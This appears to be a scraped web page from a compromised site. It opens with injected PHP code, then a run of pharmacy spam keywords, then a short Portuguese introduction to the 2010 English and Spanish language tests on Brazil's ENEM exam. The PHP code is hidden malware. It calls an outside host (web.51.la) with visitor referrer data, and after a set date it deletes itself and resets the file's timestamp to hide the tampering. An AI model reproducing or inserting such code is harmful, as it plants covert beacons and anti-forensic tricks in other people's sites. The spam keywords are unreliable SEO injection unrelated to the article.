check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456733914){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM order compazine qtc viagra professional discount information bactrim discount vouchers augmentin to buy online cheap relafen buy buy unisom japan order torsemide canada buy lipitor new zealand order proactiv skin care order antabuse you buy alavert miami cheap actoplus met side effects buy alavert accessories cheap geriforte buy capoten liquid buy cefixime online buy parlodel generic cialis discount card cvs cheap lanoxin y38 cheap penegra india

Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM

ImprimirE-mail

A reformulação do Exame Nacional do Ensino Médio-ENEM possibilitou o seu uso como forma de seleção para ingresso dos estudantes nas universidades. Os objetivos dessa reformulação são democratizar as oportunidades de acesso às universidades federais, possibilitar mobilidade acadêmica e induzir uma reestruturação dos currículos do ensino médo. Em 2010, o Exame conta pela primeira vez com questões de língua estrangeira – inglês e espanhol. O Edital do Exame publicado no site do INEP neste mesmo ano apresenta como objetivo das provas de línguas estrangeiras “conhecer e usar língua(s) estrangeira(s) moderna(s) como instrumento de acesso a informações e a outras culturas e grupos sociais”, o que implica tanto em aprender sobre fatos da língua-alvo como aprender a usar a língua-alvo.